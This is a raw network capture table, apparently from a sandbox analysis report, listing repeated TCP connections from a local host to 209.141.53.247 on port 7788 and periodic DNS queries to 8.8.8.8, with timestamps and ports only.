Jul 2, 2024 18:18:37.256922007 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:37.265230894 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:37.274859905 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:37.283231974 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:37.283310890 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:37.292921066 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:37.301131964 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:38.890305042 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:38.892294884 CEST	44632	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:38.898227930 CEST	7788	44632	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:38.907880068 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:38.912710905 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:38.912771940 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:38.927310944 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:38.932141066 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:40.559597969 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:40.561005116 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:40.561223984 CEST	44634	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:40.566024065 CEST	7788	44634	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:40.583591938 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:40.588566065 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:40.588649988 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:40.594928980 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:40.599787951 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:42.184874058 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:42.186578989 CEST	44636	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:42.191509962 CEST	7788	44636	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:42.201097965 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:42.206099033 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:42.206163883 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:42.220583916 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:42.225492954 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:43.796083927 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:43.796876907 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:43.797482967 CEST	44638	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:43.802292109 CEST	7788	44638	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:43.815045118 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:43.821192980 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:43.821247101 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:43.832189083 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:43.837023973 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:45.479082108 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:45.480817080 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:45.481192112 CEST	44640	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:45.486046076 CEST	7788	44640	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:45.496599913 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:45.501425982 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:45.501482010 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:45.513004065 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:45.518517971 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:47.108345985 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:47.108865023 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:47.110855103 CEST	44642	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:47.117031097 CEST	7788	44642	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:47.127902985 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:47.132610083 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:47.132669926 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:47.145164967 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:47.150299072 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:48.731062889 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:48.732692957 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:48.733203888 CEST	44644	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:48.737984896 CEST	7788	44644	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:48.752998114 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:48.758109093 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:48.758188963 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:48.773035049 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:48.777746916 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:50.359492064 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:50.360632896 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:50.361293077 CEST	44646	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:50.366174936 CEST	7788	44646	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:50.377706051 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:50.384088993 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:50.384177923 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:50.391122103 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:50.396327972 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:52.048388004 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:52.048619986 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:52.050729036 CEST	44648	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:52.055624962 CEST	7788	44648	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:52.067065954 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:52.071875095 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:52.071935892 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:52.083055973 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:52.087954998 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:53.687491894 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:53.688478947 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:53.689032078 CEST	44650	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:53.693897009 CEST	7788	44650	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:53.705183029 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:53.710067987 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:53.710150957 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:53.722235918 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:53.727041006 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:55.311156034 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:55.312407970 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:55.313256025 CEST	44652	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:55.318016052 CEST	7788	44652	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:55.329472065 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:55.334264040 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:55.334347010 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:55.353281021 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:55.358077049 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.632855892 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.633346081 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.633470058 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.633527040 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.633565903 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.635510921 CEST	44654	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.642862082 CEST	7788	44654	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.651627064 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.658365965 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:57.658431053 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.683514118 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:57.688380003 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:59.411756039 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:59.412256956 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:59.413059950 CEST	44656	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:59.417884111 CEST	7788	44656	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:59.429352045 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:59.434174061 CEST	7788	44658	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:59.434247971 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:59.447993994 CEST	44658	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:59.452915907 CEST	7788	44658	209.141.53.247	192.168.2.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 18:17:07.956012011 CEST	55324	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:07.956263065 CEST	60997	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:07.962562084 CEST	53	60997	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:07.970762968 CEST	53	55324	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:09.585767984 CEST	47920	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:09.588418961 CEST	35799	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:09.598691940 CEST	53	35799	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:09.598722935 CEST	53	47920	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:11.218245029 CEST	56485	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:11.219312906 CEST	48633	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:11.225199938 CEST	53	56485	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:11.225665092 CEST	53	48633	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:12.829366922 CEST	44481	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:12.829869032 CEST	59753	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:12.836220980 CEST	53	59753	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:12.836313009 CEST	53	44481	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:14.439799070 CEST	44958	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:14.441613913 CEST	32951	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:14.445981979 CEST	53	44958	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:14.448255062 CEST	53	32951	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:16.047192097 CEST	48668	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:16.047370911 CEST	46991	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:16.054003954 CEST	53	46991	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:16.061954975 CEST	53	48668	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:17.676851988 CEST	57240	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:17.677113056 CEST	34926	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:17.683209896 CEST	53	57240	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:17.690737009 CEST	53	34926	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:19.323144913 CEST	47658	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:19.325397968 CEST	45366	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:19.329920053 CEST	53	47658	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:19.336252928 CEST	53	45366	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:20.985007048 CEST	51165	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:20.985742092 CEST	38849	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:20.991590023 CEST	53	51165	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:20.992747068 CEST	53	38849	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:22.617614985 CEST	50986	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:22.620430946 CEST	33056	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:22.627065897 CEST	53	33056	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:22.628916025 CEST	53	50986	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:24.239777088 CEST	36622	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:24.241271973 CEST	49117	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:24.247776031 CEST	53	36622	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:24.249950886 CEST	53	49117	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:25.862020016 CEST	56874	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:25.865768909 CEST	38681	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:25.868735075 CEST	53	56874	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:25.872354031 CEST	53	38681	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:27.493895054 CEST	47115	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:27.494240999 CEST	59913	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:27.500533104 CEST	53	59913	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:27.500977039 CEST	53	47115	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:29.113056898 CEST	44805	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:29.113287926 CEST	56090	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:29.120740891 CEST	53	56090	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:29.120754004 CEST	53	44805	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:30.720788956 CEST	42581	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:30.721255064 CEST	59837	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:30.728146076 CEST	53	42581	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:30.735800982 CEST	53	59837	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:32.384448051 CEST	48023	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:32.388045073 CEST	32797	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:32.397039890 CEST	53	48023	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:32.402626038 CEST	53	32797	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:34.102909088 CEST	53867	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:34.105892897 CEST	50646	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:34.110115051 CEST	53	53867	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:34.113179922 CEST	53	50646	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:35.804716110 CEST	55587	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:35.805700064 CEST	46763	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:35.811323881 CEST	53	55587	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:35.812756062 CEST	53	46763	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:37.428777933 CEST	45750	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:37.429017067 CEST	55978	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:37.436474085 CEST	53	55978	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:37.436606884 CEST	53	45750	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:39.057856083 CEST	37008	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:39.058794975 CEST	59884	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:39.065119028 CEST	53	37008	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:39.065876961 CEST	53	59884	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:40.672882080 CEST	51662	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:40.676434040 CEST	40359	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:40.679613113 CEST	53	51662	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:40.683464050 CEST	53	40359	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:42.281896114 CEST	40188	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:42.286051989 CEST	33062	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:42.288177013 CEST	53	40188	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:42.293342113 CEST	53	33062	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:44.343955040 CEST	33617	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:44.346936941 CEST	38010	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:44.587584972 CEST	53	38010	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:44.587726116 CEST	53	33617	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:46.235863924 CEST	45010	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:46.236004114 CEST	60759	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:46.242327929 CEST	53	60759	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:46.243077993 CEST	53	45010	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:47.865009069 CEST	36089	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:47.865421057 CEST	37059	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:47.872102976 CEST	53	36089	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:47.872596025 CEST	53	37059	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:49.540544987 CEST	36555	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:49.542979002 CEST	47765	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:49.547322035 CEST	53	36555	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:49.549815893 CEST	53	47765	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:51.158947945 CEST	56786	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:51.159199953 CEST	59303	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:51.166127920 CEST	53	56786	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:51.166146040 CEST	53	59303	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:52.766591072 CEST	36397	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:52.766813040 CEST	33855	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:52.773650885 CEST	53	36397	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:52.774274111 CEST	53	33855	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:54.407182932 CEST	34843	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:54.408224106 CEST	41804	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:54.413983107 CEST	53	34843	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:54.414343119 CEST	53	41804	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:56.017827988 CEST	60648	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:56.020405054 CEST	49202	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:56.029509068 CEST	53	60648	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:56.033642054 CEST	53	49202	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:57.648982048 CEST	44467	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:57.650273085 CEST	50178	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:57.656951904 CEST	53	44467	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:57.662435055 CEST	53	50178	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:59.298872948 CEST	34581	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:59.300964117 CEST	42522	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:17:59.305193901 CEST	53	34581	8.8.8.8	192.168.2.14
Jul 2, 2024 18:17:59.307739019 CEST	53	42522	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:00.926785946 CEST	56545	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:00.929575920 CEST	37819	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:00.933841944 CEST	53	56545	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:00.937382936 CEST	53	37819	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:02.583112955 CEST	35524	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:02.583539009 CEST	54758	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:02.591253996 CEST	53	54758	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:02.591845989 CEST	53	35524	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:04.205203056 CEST	57845	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:04.207600117 CEST	44988	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:04.212112904 CEST	53	57845	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:04.214473963 CEST	53	44988	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:05.833380938 CEST	34170	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:05.833585024 CEST	36038	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:05.840415955 CEST	53	34170	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:05.840434074 CEST	53	36038	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:07.458477974 CEST	41680	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:07.458709002 CEST	60169	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:07.464894056 CEST	53	41680	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:07.465497971 CEST	53	60169	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:09.079108000 CEST	38599	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:09.081171036 CEST	45934	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:09.085206985 CEST	53	38599	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:09.087939024 CEST	53	45934	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:10.706191063 CEST	41310	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:10.706813097 CEST	55098	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:10.713247061 CEST	53	41310	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:10.713258028 CEST	53	55098	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:12.564538002 CEST	60112	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:12.566168070 CEST	56485	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:12.581387043 CEST	53	60112	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:12.581398964 CEST	53	56485	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:14.189620018 CEST	47623	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:14.191409111 CEST	54460	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:14.196506977 CEST	53	47623	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:14.198544979 CEST	53	54460	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:15.793837070 CEST	41564	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:15.798129082 CEST	59882	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:15.802033901 CEST	53	41564	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:15.805408001 CEST	53	59882	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:17.431051970 CEST	43576	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:17.432936907 CEST	50986	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:17.437594891 CEST	53	43576	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:17.441004038 CEST	53	50986	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:19.110043049 CEST	53216	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:19.111685038 CEST	35975	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:19.116760969 CEST	53	53216	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:19.118870974 CEST	53	35975	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:20.736413002 CEST	36780	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:20.739415884 CEST	48955	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:20.743242979 CEST	53	36780	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:20.748017073 CEST	53	48955	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:22.348264933 CEST	48665	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:22.350099087 CEST	35609	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:22.356904030 CEST	53	48665	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:22.358541965 CEST	53	35609	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:23.971515894 CEST	50385	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:23.973639011 CEST	51730	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:23.978521109 CEST	53	50385	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:23.982058048 CEST	53	51730	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:25.581408978 CEST	39654	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:25.581614971 CEST	46479	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:25.590678930 CEST	53	46479	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:25.590832949 CEST	53	39654	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:27.500885010 CEST	39951	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:27.501178980 CEST	42804	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:27.507981062 CEST	53	39951	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:27.508773088 CEST	53	42804	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:29.130549908 CEST	57551	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:29.131526947 CEST	36598	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:29.136727095 CEST	53	57551	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:29.138283014 CEST	53	36598	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:30.772569895 CEST	37804	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:30.773159027 CEST	34707	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:18:30.779187918 CEST	53	37804	8.8.8.8	192.168.2.14
Jul 2, 2024 18:18:30.780316114 CEST	53	34707	8.8.8.8	192.168.2.14
